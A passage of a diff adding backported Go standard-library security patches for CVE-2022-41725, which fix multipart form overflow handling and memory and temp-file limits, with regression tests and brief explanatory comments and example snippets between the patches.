+ 1 file changed, 49 insertions(+), 30 deletions(-)
+
+diff --git a/src/vendor/golang.org/x/net/http2/hpack/hpack.go b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
+index 85f18a2..02e80e3 100644
+--- a/src/vendor/golang.org/x/net/http2/hpack/hpack.go
++++ b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
+@@ -359,6 +359,7 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
+
+ var hf HeaderField
+ wantStr := d.emitEnabled || it.indexed()
++ var undecodedName undecodedString
+ if nameIdx > 0 {
+ ihf, ok := d.at(nameIdx)
+ if !ok {
+@@ -366,15 +367,27 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
+ }
+ hf.Name = ihf.Name
+ } else {
+- hf.Name, buf, err = d.readString(buf, wantStr)
++ undecodedName, buf, err = d.readString(buf)
+ if err != nil {
+ return err
+ }
+ }
+- hf.Value, buf, err = d.readString(buf, wantStr)
++ undecodedValue, buf, err := d.readString(buf)
+ if err != nil {
+ return err
+ }
++ if wantStr {
++ if nameIdx <= 0 {
++ hf.Name, err = d.decodeString(undecodedName)
++ if err != nil {
++ return err
++ }
++ }
++ hf.Value, err = d.decodeString(undecodedValue)
++ if err != nil {
++ return err
++ }
++ }
+ d.buf = buf
+ if it.indexed() {
+ d.dynTab.add(hf)
+@@ -459,46 +472,52 @@ func readVarInt(n byte, p []byte) (i uint64, remain []byte, err error) {
+ return 0, origP, errNeedMore
+ }
+
+-// readString decodes an hpack string from p.
++// readString reads an hpack string from p.
+ //
+-// wantStr is whether s will be used. If false, decompression and
+-// []byte->string garbage are skipped if s will be ignored
+-// anyway. This does mean that huffman decoding errors for non-indexed
+-// strings past the MAX_HEADER_LIST_SIZE are ignored, but the server
+-// is returning an error anyway, and because they're not indexed, the error
+-// won't affect the decoding state.
+-func (d *Decoder) readString(p []byte, wantStr bool) (s string, remain []byte, err error) {
++// It returns a reference to the encoded string data to permit deferring decode costs
++// until after the caller verifies all data is present.
++func (d *Decoder) readString(p []byte) (u undecodedString, remain []byte, err error) {
+ if len(p) == 0 {
+- return "", p, errNeedMore
++ return u, p, errNeedMore
+ }
+ isHuff := p[0]&128 != 0
+ strLen, p, err := readVarInt(7, p)
+ if err != nil {
+- return "", p, err
++ return u, p, err
+ }
+ if d.maxStrLen != 0 && strLen > uint64(d.maxStrLen) {
+- return "", nil, ErrStringLength
++ // Returning an error here means Huffman decoding errors
++ // for non-indexed strings past the maximum string length
++ // are ignored, but the server is returning an error anyway
++ // and because the string is not indexed the error will not
++ // affect the decoding state.
++ return u, nil, ErrStringLength
+ }
+ if uint64(len(p)) < strLen {
+- return "", p, errNeedMore
+- }
+- if !isHuff {
+- if wantStr {
+- s = string(p[:strLen])
+- }
+- return s, p[strLen:], nil
++ return u, p, errNeedMore
+ }
++ u.isHuff = isHuff
++ u.b = p[:strLen]
++ return u, p[strLen:], nil
++}
+
+- if wantStr {
+- buf := bufPool.Get().(*bytes.Buffer)
+- buf.Reset() // don't trust others
+- defer bufPool.Put(buf)
+- if err := huffmanDecode(buf, d.maxStrLen, p[:strLen]); err != nil {
+- buf.Reset()
+- return "", nil, err
+- }
++type undecodedString struct {
++ isHuff bool
++ b []byte
++}
++
++func (d *Decoder) decodeString(u undecodedString) (string, error) {
++ if !u.isHuff {
++ return string(u.b), nil
++ }
++ buf := bufPool.Get().(*bytes.Buffer)
++ buf.Reset() // don't trust others
++ var s string
++ err := huffmanDecode(buf, d.maxStrLen, u.b)
++ if err == nil {
+ s = buf.String()
+- buf.Reset() // be nice to GC
+ }
+- return s, p[strLen:], nil
++ buf.Reset() // be nice to GC
++ bufPool.Put(buf)
++ return s, err
+ }
+--
+2.7.4
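
The core of the hpack change above is that readString no longer Huffman-decodes every header string as it is parsed; it keeps a reference to the raw bytes plus an isHuff flag and decodes only once the caller knows the field is wanted, bounding the work a peer can force per HEADERS frame. A rough, self-contained sketch of that defer-the-decode idea; the types and the decode stub below are illustrative, not the unexported hpack internals:

package main

import "fmt"

// undecoded mirrors the idea behind hpack's unexported undecodedString:
// hold the wire bytes and a compression flag, and pay the decode cost later.
type undecoded struct {
	compressed bool
	b          []byte
}

// decodeLater stands in for the real Huffman decoder; it is only a stub.
func decodeLater(u undecoded) (string, error) {
	if !u.compressed {
		return string(u.b), nil
	}
	return fmt.Sprintf("<huffman payload, %d bytes>", len(u.b)), nil
}

func main() {
	// First read and validate all fields, then decode only the ones kept.
	raw := undecoded{compressed: false, b: []byte("example-header-value")}
	s, err := decodeLater(raw)
	fmt.Println(s, err)
}
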
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
new file mode 100644
index 0000000000..37ebc41947
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
@@ -0,0 +1,85 @@
+From 874b3132a84cf76da6a48978826c04c380a37a50 Mon Sep 17 00:00:00 2001
+From: avivklas <avivklas@gmail.com>
+Date: Fri, 7 Aug 2020 21:50:12 +0300
+Subject: [PATCH] mime/multipart: return overflow errors in Reader.ReadForm
+
+Updates Reader.ReadForm to check for overflow errors that may
+result from a leeway addition of 10MiB to the input argument
+maxMemory.
+
+Fixes #40430
+
+Change-Id: I510b8966c95c51d04695ba9d08fcfe005fd11a5d
+Reviewed-on: https://go-review.googlesource.com/c/go/+/247477
+Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
+Trust: Cuong Manh Le <cuong.manhle.vn@gmail.com>
+Trust: Emmanuel Odeke <emm.odeke@gmail.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Emmanuel Odeke <emm.odeke@gmail.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/874b3132a84cf76da6a48978826c04c380a37a50]
+CVE: CVE-2022-41725 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 4 ++++
+ src/mime/multipart/formdata_test.go | 18 ++++++++++++++++++
+ 2 files changed, 22 insertions(+)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 832d0ad693666..4eb31012941ac 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "errors"
++ "fmt"
+ "io"
+ "io/ioutil"
+ "net/textproto"
+@@ -41,6 +42,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+
+ // Reserve an additional 10 MB for non-file parts.
+ maxValueBytes := maxMemory + int64(10<<20)
++ if maxValueBytes <= 0 {
++ return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
++ }
+ for {
+ p, err := r.NextPart()
+ if err == io.EOF {
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 7d756c8c244a0..7112e0d3727fe 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "io"
++ "math"
+ "os"
+ "strings"
+ "testing"
+@@ -52,6 +53,23 @@ func TestReadFormWithNamelessFile(t *testing.T) {
+ }
+ }
+
++// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
++// instead of silently and subtly failing without indication.
++func TestReadFormMaxMemoryOverflow(t *testing.T) {
++ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
++ r := NewReader(b, boundary)
++ f, err := r.ReadForm(math.MaxInt64)
++ if err == nil {
++ t.Fatal("Unexpected a non-nil error")
++ }
++ if f != nil {
++ t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
++ }
++ if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
++ t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
++ }
++}
++
+ func TestReadFormWithTextContentType(t *testing.T) {
+ // From https://github.com/golang/go/issues/24041
+ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
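
The new guard exists because the pre-existing code computed maxMemory + 10MiB in int64 arithmetic, which wraps to a negative value when maxMemory is near math.MaxInt64 and silently disables the limit. A small stand-alone demonstration of the wraparound the check now reports:

package main

import (
	"fmt"
	"math"
)

func main() {
	maxMemory := int64(math.MaxInt64)
	// The leeway addition from readForm: wraps around for a huge maxMemory.
	maxValueBytes := maxMemory + int64(10<<20)
	fmt.Println(maxValueBytes, maxValueBytes <= 0) // a negative value, true
}
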
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
new file mode 100644
index 0000000000..b951ee893e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
@@ -0,0 +1,97 @@
+From 4e5a313524da62600eb59dbf98624cfe946456f8 Mon Sep 17 00:00:00 2001
+From: Emmanuel T Odeke <emmanuel@orijtech.com>
+Date: Tue, 20 Oct 2020 04:11:12 -0700
+Subject: [PATCH] net/http: test that ParseMultipartForm catches overflows
+
+Tests that if the combination of:
+* HTTP multipart file payload size
+* ParseMultipartForm's maxMemory parameter
+* the internal leeway buffer size of 10MiB
+
+overflows, then we'll report an overflow instead of silently
+passing.
+
+Reapplies and fixes CL 254977, which was reverted in CL 263658.
+
+The prior test lacked a res.Body.Close(), so fixed that and
+added a leaked Transport check to verify correctness.
+
+Updates 40430.
+
+Change-Id: I3c0f7ef43d621f6eb00f07755f04f9f36c51f98f
+Reviewed-on: https://go-review.googlesource.com/c/go/+/263817
+Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Bryan C. Mills <bcmills@google.com>
+Trust: Damien Neil <dneil@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/4e5a313524da62600eb59dbf98624cfe946456f8]
+CVE: CVE-2022-41725 #Dependency Patch2
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/request_test.go | 45 ++++++++++++++++++++++++++++++++++++
+ 1 file changed, 45 insertions(+)
+
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index b4ef472e71229..19526b9ad791a 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -13,6 +13,7 @@ import (
+ "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "mime/multipart"
+ . "net/http"
+ "net/http/httptest"
+@@ -245,6 +246,50 @@ func TestParseMultipartForm(t *testing.T) {
+ }
+ }
+
++// Issue #40430: Test that if maxMemory for ParseMultipartForm when combined with
++// the payload size and the internal leeway buffer size of 10MiB overflows, that we
++// correctly return an error.
++func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
++ defer afterTest(t)
++
++ payloadSize := 1 << 10
++ cst := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
++ // The combination of:
++ // MaxInt64 + payloadSize + (internal spare of 10MiB)
++ // triggers the overflow. See issue https://golang.org/issue/40430/
++ if err := req.ParseMultipartForm(math.MaxInt64); err != nil {
++ Error(rw, err.Error(), StatusBadRequest)
++ return
++ }
++ }))
++ defer cst.Close()
++ fBuf := new(bytes.Buffer)
++ mw := multipart.NewWriter(fBuf)
++ mf, err := mw.CreateFormFile("file", "myfile.txt")
++ if err != nil {
++ t.Fatal(err)
++ }
++ if _, err := mf.Write(bytes.Repeat([]byte("abc"), payloadSize)); err != nil {
++ t.Fatal(err)
++ }
++ if err := mw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ req, err := NewRequest("POST", cst.URL, fBuf)
++ if err != nil {
++ t.Fatal(err)
++ }
++ req.Header.Set("Content-Type", mw.FormDataContentType())
++ res, err := cst.Client().Do(req)
++ if err != nil {
++ t.Fatal(err)
++ }
++ res.Body.Close()
++ if g, w := res.StatusCode, StatusBadRequest; g != w {
++ t.Fatalf("Status code mismatch: got %d, want %d", g, w)
++ }
++}
++
+ func TestRedirect_h1(t *testing.T) { testRedirect(t, h1Mode) }
+ func TestRedirect_h2(t *testing.T) { testRedirect(t, h2Mode) }
+ func testRedirect(t *testing.T, h2 bool) {
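
The test drives the overflow through net/http. For contrast, a typical handler passes a modest in-memory limit to ParseMultipartForm and lets larger file parts spill to temporary files; a minimal sketch, where the 32 MiB figure and the route are arbitrary choices rather than values from the patch:

package main

import (
	"fmt"
	"log"
	"net/http"
)

func upload(w http.ResponseWriter, r *http.Request) {
	// Keep up to 32 MiB in memory; larger file parts go to temp files.
	if err := r.ParseMultipartForm(32 << 20); err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	fmt.Fprintf(w, "fields: %d, files: %d\n",
		len(r.MultipartForm.Value), len(r.MultipartForm.File))
}

func main() {
	http.HandleFunc("/upload", upload)
	log.Fatal(http.ListenAndServe("127.0.0.1:8080", nil))
}
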
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
new file mode 100644
index 0000000000..767225b888
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
@@ -0,0 +1,98 @@
+From 5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 3 Dec 2020 09:45:07 -0500
+Subject: [PATCH] mime/multipart: handle ReadForm(math.MaxInt64) better
+
+Returning an error about integer overflow is needlessly pedantic.
+The meaning of ReadForm(MaxInt64) is easily understood
+(accept a lot of data) and can be implemented.
+
+Fixes #40430.
+
+Change-Id: I8a522033dd9a2f9ad31dd2ad82cf08d553736ab9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/275112
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Ian Lance Taylor <iant@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43]
+CVE: CVE-2022-41725 #Dependency Patch3
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 8 ++++++--
+ src/mime/multipart/formdata_test.go | 14 +++++---------
+ src/net/http/request_test.go | 2 +-
+ 3 files changed, 12 insertions(+), 12 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 4eb31012941ac..9c42ea8c023b5 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,9 +7,9 @@ package multipart
+ import (
+ "bytes"
+ "errors"
+- "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "net/textproto"
+ "os"
+ )
+@@ -43,7 +43,11 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ // Reserve an additional 10 MB for non-file parts.
+ maxValueBytes := maxMemory + int64(10<<20)
+ if maxValueBytes <= 0 {
+- return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
++ if maxMemory < 0 {
++ maxValueBytes = 0
++ } else {
++ maxValueBytes = math.MaxInt64
++ }
+ }
+ for {
+ p, err := r.NextPart()
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 7112e0d3727fe..e3a3a3eae8e15 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -53,20 +53,16 @@ func TestReadFormWithNamelessFile(t *testing.T) {
+ }
+ }
+
+-// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
+-// instead of silently and subtly failing without indication.
++// Issue 40430: Handle ReadForm(math.MaxInt64)
+ func TestReadFormMaxMemoryOverflow(t *testing.T) {
+ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
+ r := NewReader(b, boundary)
+ f, err := r.ReadForm(math.MaxInt64)
+- if err == nil {
+- t.Fatal("Unexpected a non-nil error")
+- }
+- if f != nil {
+- t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
++ if err != nil {
++ t.Fatalf("ReadForm(MaxInt64): %v", err)
+ }
+- if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
+- t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
++ if f == nil {
++ t.Fatal("ReadForm(MaxInt64): missing form")
+ }
+ }
+
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 19526b9ad791a..689498e19d5dd 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -285,7 +285,7 @@ func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
+ t.Fatal(err)
+ }
+ res.Body.Close()
+- if g, w := res.StatusCode, StatusBadRequest; g != w {
++ if g, w := res.StatusCode, StatusOK; g != w {
+ t.Fatalf("Status code mismatch: got %d, want %d", g, w)
+ }
+ }
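
After this change ReadForm(math.MaxInt64) simply means "accept a lot of data" instead of returning an overflow error. A sketch of calling ReadForm directly on a multipart.Reader; the boundary and body below are made up for the example:

package main

import (
	"fmt"
	"math"
	"mime/multipart"
	"strings"
)

func main() {
	body := "--b\r\n" +
		"Content-Disposition: form-data; name=\"field\"\r\n" +
		"\r\n" +
		"hello\r\n" +
		"--b--\r\n"
	r := multipart.NewReader(strings.NewReader(body), "b")
	// With the fix this no longer fails with an integer-overflow error.
	form, err := r.ReadForm(math.MaxInt64)
	if err != nil {
		panic(err)
	}
	defer form.RemoveAll()
	fmt.Println(form.Value["field"][0]) // hello
}
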
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
new file mode 100644
index 0000000000..5f80c62b0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
@@ -0,0 +1,660 @@
+From 5c55ac9bf1e5f779220294c843526536605f42ab Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 25 Jan 2023 09:27:01 -0800
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit memory/inode consumption of ReadForm
+
+Reader.ReadForm is documented as storing "up to maxMemory bytes + 10MB"
+in memory. Parsed forms can consume substantially more memory than
+this limit, since ReadForm does not account for map entry overhead
+and MIME headers.
+
+In addition, while the amount of disk memory consumed by ReadForm can
+be constrained by limiting the size of the parsed input, ReadForm will
+create one temporary file per form part stored on disk, potentially
+consuming a large number of inodes.
+
+Update ReadForm's memory accounting to include part names,
+MIME headers, and map entry overhead.
+
+Update ReadForm to store all on-disk file parts in a single
+temporary file.
+
+Files returned by FileHeader.Open are documented as having a concrete
+type of *os.File when a file is stored on disk. The change to use a
+single temporary file for all parts means that this is no longer the
+case when a form contains more than a single file part stored on disk.
+
+The previous behavior of storing each file part in a separate disk
+file may be reenabled with GODEBUG=multipartfiles=distinct.
+
+Update Reader.NextPart and Reader.NextRawPart to set a 10MiB cap
+on the size of MIME headers.
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+Updates #58006
+Fixes #58362
+Fixes CVE-2022-41725
+
+Change-Id: Ibd780a6c4c83ac8bcfd3cbe344f042e9940f2eab
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1714276
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit ed4664330edcd91b24914c9371c377c132dbce8c)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728949
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468116
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Than McIntosh <thanm@google.com>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5c55ac9bf1e5f779220294c843526536605f42ab]
+CVE: CVE-2022-41725
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 132 ++++++++++++++++++++-----
+ src/mime/multipart/formdata_test.go | 140 ++++++++++++++++++++++++++-
+ src/mime/multipart/multipart.go | 25 +++--
+ src/mime/multipart/readmimeheader.go | 14 +++
+ src/net/http/request_test.go | 2 +-
+ src/net/textproto/reader.go | 27 ++++++
+ 6 files changed, 303 insertions(+), 37 deletions(-)
+ create mode 100644 src/mime/multipart/readmimeheader.go
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 9c42ea8..1eeb340 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "errors"
++ "internal/godebug"
+ "io"
+ "io/ioutil"
+ "math"
+@@ -34,23 +35,58 @@ func (r *Reader) ReadForm(maxMemory int64) (*Form, error) {
+
+ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ form := &Form{make(map[string][]string), make(map[string][]*FileHeader)}
++ var (
++ file *os.File
++ fileOff int64
++ )
++ numDiskFiles := 0
++ multipartFiles := godebug.Get("multipartfiles")
++ combineFiles := multipartFiles != "distinct"
+ defer func() {
++ if file != nil {
++ if cerr := file.Close(); err == nil {
++ err = cerr
++ }
++ }
++ if combineFiles && numDiskFiles > 1 {
++ for _, fhs := range form.File {
++ for _, fh := range fhs {
++ fh.tmpshared = true
++ }
++ }
++ }
+ if err != nil {
+ form.RemoveAll()
++ if file != nil {
++ os.Remove(file.Name())
++ }
+ }
+ }()
+
+- // Reserve an additional 10 MB for non-file parts.
+- maxValueBytes := maxMemory + int64(10<<20)
+- if maxValueBytes <= 0 {
++ // maxFileMemoryBytes is the maximum bytes of file data we will store in memory.
++ // Data past this limit is written to disk.
++ // This limit strictly applies to content, not metadata (filenames, MIME headers, etc.),
++ // since metadata is always stored in memory, not disk.
++ //
++ // maxMemoryBytes is the maximum bytes we will store in memory, including file content,
++ // non-file part values, metdata, and map entry overhead.
++ //
++ // We reserve an additional 10 MB in maxMemoryBytes for non-file data.
++ //
++ // The relationship between these parameters, as well as the overly-large and
++ // unconfigurable 10 MB added on to maxMemory, is unfortunate but difficult to change
++ // within the constraints of the API as documented.
++ maxFileMemoryBytes := maxMemory
++ maxMemoryBytes := maxMemory + int64(10<<20)
++ if maxMemoryBytes <= 0 {
+ if maxMemory < 0 {
+- maxValueBytes = 0
++ maxMemoryBytes = 0
+ } else {
+- maxValueBytes = math.MaxInt64
++ maxMemoryBytes = math.MaxInt64
+ }
+ }
+ for {
+- p, err := r.NextPart()
++ p, err := r.nextPart(false, maxMemoryBytes)
+ if err == io.EOF {
+ break
+ }
+@@ -64,16 +100,27 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+ filename := p.FileName()
+
++ // Multiple values for the same key (one map entry, longer slice) are cheaper
++ // than the same number of values for different keys (many map entries), but
++ // using a consistent per-value cost for overhead is simpler.
++ maxMemoryBytes -= int64(len(name))
++ maxMemoryBytes -= 100 // map overhead
++ if maxMemoryBytes < 0 {
++ // We can't actually take this path, since nextPart would already have
++ // rejected the MIME headers for being too large. Check anyway.
++ return nil, ErrMessageTooLarge
++ }
++
+ var b bytes.Buffer
+
+ if filename == "" {
+ // value, store as string in memory
+- n, err := io.CopyN(&b, p, maxValueBytes+1)
++ n, err := io.CopyN(&b, p, maxMemoryBytes+1)
+ if err != nil && err != io.EOF {
+ return nil, err
+ }
+- maxValueBytes -= n
+- if maxValueBytes < 0 {
++ maxMemoryBytes -= n
++ if maxMemoryBytes < 0 {
+ return nil, ErrMessageTooLarge
+ }
+ form.Value[name] = append(form.Value[name], b.String())
+@@ -81,35 +128,45 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+
+ // file, store in memory or on disk
++ maxMemoryBytes -= mimeHeaderSize(p.Header)
++ if maxMemoryBytes < 0 {
++ return nil, ErrMessageTooLarge
++ }
+ fh := &FileHeader{
+ Filename: filename,
+ Header: p.Header,
+ }
+- n, err := io.CopyN(&b, p, maxMemory+1)
++ n, err := io.CopyN(&b, p, maxFileMemoryBytes+1)
+ if err != nil && err != io.EOF {
+ return nil, err
+ }
+- if n > maxMemory {
+- // too big, write to disk and flush buffer
+- file, err := ioutil.TempFile("", "multipart-")
+- if err != nil {
+- return nil, err
++ if n > maxFileMemoryBytes {
++ if file == nil {
++ file, err = ioutil.TempFile(r.tempDir, "multipart-")
++ if err != nil {
++ return nil, err
++ }
+ }
++ numDiskFiles++
+ size, err := io.Copy(file, io.MultiReader(&b, p))
+- if cerr := file.Close(); err == nil {
+- err = cerr
+- }
+ if err != nil {
+- os.Remove(file.Name())
+ return nil, err
+ }
+ fh.tmpfile = file.Name()
+ fh.Size = size
++ fh.tmpoff = fileOff
++ fileOff += size
++ if !combineFiles {
++ if err := file.Close(); err != nil {
++ return nil, err
++ }
++ file = nil
++ }
+ } else {
+ fh.content = b.Bytes()
+ fh.Size = int64(len(fh.content))
+- maxMemory -= n
+- maxValueBytes -= n
++ maxFileMemoryBytes -= n
++ maxMemoryBytes -= n
+ }
+ form.File[name] = append(form.File[name], fh)
+ }
+@@ -117,6 +174,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ return form, nil
+ }
+
++func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
++ for k, vs := range h {
++ size += int64(len(k))
++ size += 100 // map entry overhead
++ for _, v := range vs {
++ size += int64(len(v))
++ }
++ }
++ return size
++}
++
+ // Form is a parsed multipart form.
+ // Its File parts are stored either in memory or on disk,
+ // and are accessible via the *FileHeader's Open method.
+@@ -134,7 +202,7 @@ func (f *Form) RemoveAll() error {
+ for _, fh := range fhs {
+ if fh.tmpfile != "" {
+ e := os.Remove(fh.tmpfile)
+- if e != nil && err == nil {
++ if e != nil && !errors.Is(e, os.ErrNotExist) && err == nil {
+ err = e
+ }
+ }
+@@ -149,15 +217,25 @@ type FileHeader struct {
+ Header textproto.MIMEHeader
+ Size int64
+
+- content []byte
+- tmpfile string
++ content []byte
++ tmpfile string
++ tmpoff int64
++ tmpshared bool
+ }
+
+ // Open opens and returns the FileHeader's associated File.
+ func (fh *FileHeader) Open() (File, error) {
+ if b := fh.content; b != nil {
+ r := io.NewSectionReader(bytes.NewReader(b), 0, int64(len(b)))
+- return sectionReadCloser{r}, nil
++ return sectionReadCloser{r, nil}, nil
++ }
++ if fh.tmpshared {
++ f, err := os.Open(fh.tmpfile)
++ if err != nil {
++ return nil, err
++ }
++ r := io.NewSectionReader(f, fh.tmpoff, fh.Size)
++ return sectionReadCloser{r, f}, nil
+ }
+ return os.Open(fh.tmpfile)
+ }
+@@ -176,8 +254,12 @@ type File interface {
+
+ type sectionReadCloser struct {
+ *io.SectionReader
++ io.Closer
+ }
+
+ func (rc sectionReadCloser) Close() error {
++ if rc.Closer != nil {
++ return rc.Closer.Close()
++ }
+ return nil
+ }
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index e3a3a3e..5cded71 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -6,8 +6,10 @@ package multipart
+
+ import (
+ "bytes"
++ "fmt"
+ "io"
+ "math"
++ "net/textproto"
+ "os"
+ "strings"
+ "testing"
+@@ -208,8 +210,8 @@ Content-Disposition: form-data; name="largetext"
+ maxMemory int64
+ err error
+ }{
+- {"smaller", 50, nil},
+- {"exact-fit", 25, nil},
++ {"smaller", 50 + int64(len("largetext")) + 100, nil},
++ {"exact-fit", 25 + int64(len("largetext")) + 100, nil},
+ {"too-large", 0, ErrMessageTooLarge},
+ }
+ for _, tc := range testCases {
+@@ -224,7 +226,7 @@ Content-Disposition: form-data; name="largetext"
+ defer f.RemoveAll()
+ }
+ if tc.err != err {
+- t.Fatalf("ReadForm error - got: %v; expected: %v", tc.err, err)
++ t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
+ }
+ if err == nil {
+ if g := f.Value["largetext"][0]; g != largeTextValue {
+@@ -234,3 +236,135 @@ Content-Disposition: form-data; name="largetext"
+ })
+ }
+ }
++
++// TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
++// MIME headers, and map entry overhead while limiting the memory consumption of parsed forms.
++func TestReadForm_MetadataTooLarge(t *testing.T) {
++ for _, test := range []struct {
++ name string
++ f func(*Writer)
++ }{{
++ name: "large name",
++ f: func(fw *Writer) {
++ name := strings.Repeat("a", 10<<20)
++ w, _ := fw.CreateFormField(name)
++ w.Write([]byte("value"))
++ },
++ }, {
++ name: "large MIME header",
++ f: func(fw *Writer) {
++ h := make(textproto.MIMEHeader)
++ h.Set("Content-Disposition", `form-data; name="a"`)
++ h.Set("X-Foo", strings.Repeat("a", 10<<20))
++ w, _ := fw.CreatePart(h)
++ w.Write([]byte("value"))
++ },
++ }, {
++ name: "many parts",
++ f: func(fw *Writer) {
++ for i := 0; i < 110000; i++ {
++ w, _ := fw.CreateFormField("f")
++ w.Write([]byte("v"))
++ }
++ },
++ }} {
++ t.Run(test.name, func(t *testing.T) {
